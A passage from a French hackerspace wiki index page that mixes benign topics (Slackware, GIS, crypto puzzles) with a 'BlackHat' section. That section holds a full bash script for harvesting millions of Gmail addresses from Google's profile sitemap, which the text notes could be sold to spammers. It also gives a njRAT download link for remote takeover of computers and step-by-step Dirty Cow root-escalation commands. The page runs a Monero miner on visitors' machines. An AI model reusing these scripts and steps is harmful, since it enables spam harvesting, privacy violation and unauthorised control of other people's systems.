Soutenir Vision du Web dans son partage de logiciels et de ressources libres

Ce mineur crée de la monnaie numérique Monero pour soutenir Vision du web.
Merci de désactiver votre bloqueur de publicité.
Aucune publicité ne sera affichée.
Le mineur utilise les ressources de votre machine pour créer gratuitement de la monnaie numérique.
Le montant des donations pour Vision du web est de 0.058160633937716 Monero.

Sommaire We make Hack

De Wiki. Analyse, Communication, Développement, Hacking.
Aller à : navigation, rechercher
Naviguer sur le site : Accueil du site - Les annuaires - Les éditoriaux - Le forum - Les outils - Les projets
 

Sommaire We make Hack

Les recherches collaboratives et travaux collaboratifs ouverts avec d'autres personnes et communautés.

OpenCV

OpenCV.

Installer Slackware

The Slackware Linux Project.
Site officiel : www.slackware.com
Documentation officielle : docs.slackware.com
Distribution Live : bear.alienbase.nl/mirrors/slackware/slackware-live/
Vos questions sur : www.linuxquestions.org/questions/slackware-14/

SIG et géolocalisation

ArcGIS logiciel SIG par Environmental Systems Research Institute

ArcGIS logiciel SIG par Environmental Systems Research Institute

3 formes de géolocalisation pour le web

1) GEOIP : une BDD externe qui jumelle ton IP a une région.
2) GOOGLE LOCATION : qui utilise un GPS pour identifier ta location spécifique et maintenant.
3) La géolocalisation HTML 5 : je ne connais pas sont fonctionnement pour identifier la géolocalisation.

Calculer des distances sur une carte de la route

Calculer des distances sur une carte de la route.

BlackHat

Bypass un captcha

La communauté BitcoinBlackHat propose un solveur de captcha.

Hacker avec Javascript

Hacker avec Javascript.

Le Phishing

Phishing avec PHP.

Le spam avec GMail

Une négligence de la part de Google découverte en 2011. En effet, il est possible de récupérer par le biais d'un sitemap l'ensemble des adresses des profils Google.
Celles-ci, bien que masquées par un ID, redirigent dans la plupart des cas, vers des adresses de la forme https://profiles.google.com/PSEUDOGMAIL ce qui permet à n'importe qui d'en déduire l'adresse Gmail rattachée au profil consulté.
Voici une méthode avec des commandes bash pour récupérer l'ensemble des 35 millions d'adresses Gmail.
Cette méthode nécessite un espace disque de stockage important. Compter 20 Go ou plus pour être sur de pouvoir télécharger l'ensemble des données.
Pour commencer, on récupère le fameux sitemap de Google :
mkdir google-urls-profile && cd google-urls-profile
wget --quiet http://www.gstatic.com/s2/sitemaps/profiles-sitemap.xml
On parse son contenu pour en extraire uniquement les URLs et on les télécharge :
cat profiles-sitemap.xml | grep "<loc>" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' > list.txt
for url in `grep http list.txt`; do wget --quiet $url; done; 
Au final, on se retrouve avec de nombreux fichiers Sitemap. Les regrouper en un seul fichier :
$ cat sitemap-*.txt > profile-urls.txt
La commande wc nous confirme que nous sommes bien en possession des 35 millions d'URLs pointant vers des profils Google.
$ wc -l profile-urls.txt
35 442 725 profile-urls.txt
Si on inspecte leur contenu, les adresses sont de la forme suivante :
https://profiles.google.com/1171359025719387936
https://profiles.google.com/1120069527109493321
Les données ne sont donc pas exploitables telles quelles, car le profil Google de chaque utilisateur est masqué par un ID (ex: 1171359025719387936) qui ne nous donne aucune indication.
Mais cette adresse redirige, dans la plupart des cas, vers https://profiles.google.com/PSEUDOGMAIL.
En fait, cela est vrai quand un utilisateur a activé le mode "user friendly" dans son compte.
Nous allons être obligés de tester l'ensemble des 35 millions d'URLs ce qui prend pas mal de temps, pour récupérer l'adresse qui se cache derrière cette redirection.
On peut le faire assez facilement avec ce script, nommé getmail.sh :
#!/bin/bash
for url in `cat $1`
do
curl --silent --head $url | grep "^Location:" >> getmail.txt
done
Appeller le script comme ça :
chmod +x getmail.sh
for file in `ls sitemap-*.txt`; do ./getmail.sh $file; rm -f $file; done; 
L'avantage de cette méthode est la suivante :
Si une adresse de profil ne possède pas de redirection, le champ "Location:" donné par la commande curl ne sera pas renseigné.
Cela permet de filtrer uniquement les adresses avec un pseudo Gmail valide.
Une fois le traitement terminé, il ne nous reste plus qu'à rajouter "@gmail.com" à la fin de chaque pseudo, pour construire une liste valide :
cat getmail.txt | awk -F'google.com/' '{print $2"@gmail.com"}' 
Dans ce cas précis, cette méthode a permis de construire une liste de 15 000 adresses Gmail en moins d'une heure.
Je me suis arrêté avant la fin, car je n'ai finalement aucun intérêt à collecter ce genre d'informations.
N'importe qui peut utiliser cette méthode pour constituer une liste d'adresses mail et la revendre à des spammeurs par exemple.
Par Sébastien Bilbeau, publié le 20 mai 2011 : http://www.tux-planet.fr/comment-recuperer-les-35-millions-dadresses-gmail/

Faille Cross-Site Scripting XSS

Source : https://fr.wikipedia.org/wiki/Cross-site_scripting

DNS Spoffing Attaque et contre attaque

Scanner de sécurité Nikto

Nikto est un scanner de sécurité pour les serveurs web, et est programmé en langage P.E.R.L. Ses fonctionnalités sont d'auditer vos serveurs web à la recherche de failles diverses, de tester potentiellement près de 6000 vulnérabilités CGI et fichiers dangereux, de vérifier l'obsolescence du serveur et ses composants logiciels, de rechercher les dossiers pouvant contenir des informations sensibles. 
Source : https://doc.ubuntu-fr.org/nikto

RAT

RAT : Remote Administration Tool - Outil d'administration à distance.

Créer un rat en Python

Créer un rat en Python.

Hacker et prendre le contrôle d'un ordinateur à distance avec njRAT

Hacker et prendre le contrôle d'un ordinateur à distance avec njRAT le 2 Mars 2017
Téléchargement njRAT version officielle: https://www.up-4ever.com/jfhzoobp9wvx
hack123

RAT - Informations complémentaires

Source : http://assiste.com.free.fr/p/abc/a/rat_remote_administration_tool.html

Avoir les privilèges de super utilisateur root sous GNU/Linux avec la faille Dirty Cow

Télécharger depuis Github un fichier  zip (CVE-2016-5195) qui nous permettra d'exploiter la faille Dirty Cow.
Source : https//github.com/gbonacini/CVE-2016-5195
cd Desktop             cette ligne de commande est pour naviger vers le bureau
cd CVE-2016-5195       cette ligne de commande est pour entrer dans le dossier CVE-2016-5195
id                     cette ligne de commande vous permettra de savoir que vous etes sous un simple compte utilisateur 
make                   la commande make sans arguments exécute la première règle du Makefile
./dcow                 cette ligne de commande est pour executer l'exploit de Durty Cow.
Après l’exécution de la dernière commande ./dcow , vous aurez pour résultat un mot de passe : "dirtyCowFun" qu'il faut saisir après la commande su après ça vous aurez les privilèges du super utilisateur.
Source : http://www.walidtech.com/2016/11/walidtech-hacking-linux-exploit.html

01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100

Challenge Cryptographie

1+3+3=7

Déchiffrer : 13m07d3p45533572341173
Leet Speak 1337 5p34k ou encore Leet Speak 1337 5|*34|< utilise des caractères et des symboles pour écrire d'une manière peu compréhensible pour un débutant afin de se différencier de lui.
Le principe est d'écrire des caractères avec d'autres graphiquement proches.
Utiliser un outil pour lire ou écrire en Leet Speak : https://www.dcode.fr/leet-speak-1337
Résultat : IEmOTdEpASSEESTREAIITE
La phrase est à convertir en minuscule, et permet alors de connaître le mot de passe.

Challenge Programmation

Renvoi

Lien.

Valider les challenges

Les solutions : http://01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100-solution.blogspot.com
Autres propositions de scripts pour avancer avec les challenges de 01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100.
Le Github de Zer00CooL : https://github.com/ZerooCool/01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100

Politiques de transition écologique et économique

Politiques de transition écologique et économique.

Dictionnaire

Dictionnaire.

NAVIGATION

COMPRENDRE LA BLOCKCHAIN PAR LA PRATIQUE

Obtenir gratuitement de la cryptomonnaie sur internet : https://www.visionduweb.eu/forum/bitcoin/1597-gagner-des-bitcoins-miner-des-bitcoins

PARTICIPER ET PARTAGER

Vous êtes sur le HackerSpace de Vision du Web.
Les pages présentées sur le wiki évoluent tous les jours.
Certaines recherches sont peu abouties et incluent des erreurs.
Pour participer sur le wiki, créer un compte utilisateur en haut à droite.
Pourquoi utiliser GNU/Linux ? Y'a moins bien, mais, c'est beaucoup plus cher.
GNU/Linux, hackerspace, opensource, logiciels libres et transition écologique.
La recherche interne du wiki permet de trouver le contenu qui vous intéresse.
Les informations présentes sur cette page sont issues d'une recherche personnelle.
Identifiez-vous pour poser vos questions sur la page de discussion de VisionDuWeb.
Améliorer le contenu des pages en faisant des propositions depuis l'onglet discussion.
Pour écrire en Markdown : Éditeur - Générateur de tableau 1 - Générateur de tableau 2.
Vous pouvez partager les articles du wiki avec l'ensemble de la communauté des internautes.
Les recherches sur la sécurité servent à administrer et protéger votre système informatique.
Les informations du wiki ne doivent pas servir à nuire à autrui ou à un système informatique.
De nombreux outils gratuits sont listés et disponibles dans la boîte à outils de Vision du web.
D'autres pages du wiki peuvent correspondre à vos attentes. La liste de toutes les pages du wiki.

SOUTENIR LE WIKI

Soutenir le wiki avec des Bitcoins.
Soutenir le wiki avec des Bitcoins Cash.
Soutenir le wiki avec des Bitcoins Gold.
Soutenir le wiki avec des Bitcore (BTX).
Soutenir le wiki avec des Blackcoins.
Soutenir le wiki avec des Bytecoins.
Soutenir le wiki avec des Clams.
Soutenir le wiki avec des Dash.
Soutenir le wiki avec des Monero.
Soutenir le wiki avec des Dogecoins.
Soutenir le wiki avec des Ethereum.
Soutenir le wiki avec des Ethereum Classique.
Soutenir le wiki avec des Litecoins.
Soutenir le wiki avec des Potcoins.
Soutenir le wiki avec des Solarcoins.
Soutenir le wiki avec des Zcash.